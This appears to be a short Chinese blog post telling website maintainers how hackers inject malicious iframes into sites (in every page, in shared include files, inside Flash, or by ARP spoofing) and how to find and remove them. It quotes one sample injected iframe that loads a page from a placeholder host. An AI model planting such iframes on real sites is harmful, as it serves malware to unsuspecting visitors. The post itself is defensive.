现在写网站的人越来越多，难免一些程序员安全水平不过关的。于是做出来的网站就成了黑客的美餐一顿。尤其是那种什么都不懂的小黑客，居然也能黑掉别人网站，让我觉得很郁闷，也很叹息。我在这里列举几种我见过的插入代码的方式，以供大家在维护网站时参考：

1、直接在每个页面加入一句：<iframe src='http://www.xxx.com/mm.htm'></iframe>，遇到这种情况比较讨厌，因为这是一个一点“环保意识”都没有的黑客。恢复的办法是找一个“批量文件替换器”，对网站进行通篇查找，遇到上面那串代码就把它替换成空。2、在网站的公共包含文件里面插入这句代码：比如说，一个公共的asp头部文件，尾部文件，或者是js脚本文件等都有可能。解决办法就是把它找出来，然后删除它。当然，要把它找出来，得稍微动动脑筋。3、比较强的一种，把代码放在Flash里面。Flash支持ActionScript，而ActionScript又跟Javascript差不多，Javascript能做的事情，它基本上也能做，所以要插入一句<iframe>是很容易的事情。要找出来可比较难，IE有一个httpwatch插件，它可能跟踪IE载入网页元素的代码，你可以看得到它在载入什么元素的时候出现的<iframe>，如果正好出现<iframe>之前是一个flash，那么恭喜你，就是它了。4、ARP攻击。关于什么是arp攻击，我就不多说了，唯一提醒一下的是，这种情况下，你的网站可能根本就没有被人改什么，看到iframe代码是因为和你网站服务器同处一个网段的某服务器在攻击你。解决办法是联系相应的网络管理人员。如果你就是该网络的管理人员，那就不用我多说什么了吧，找到“某”，断掉它。

好了，我见过的基本上就这么多，可能还有别的形式的挂马方式，有机会大家交流一下。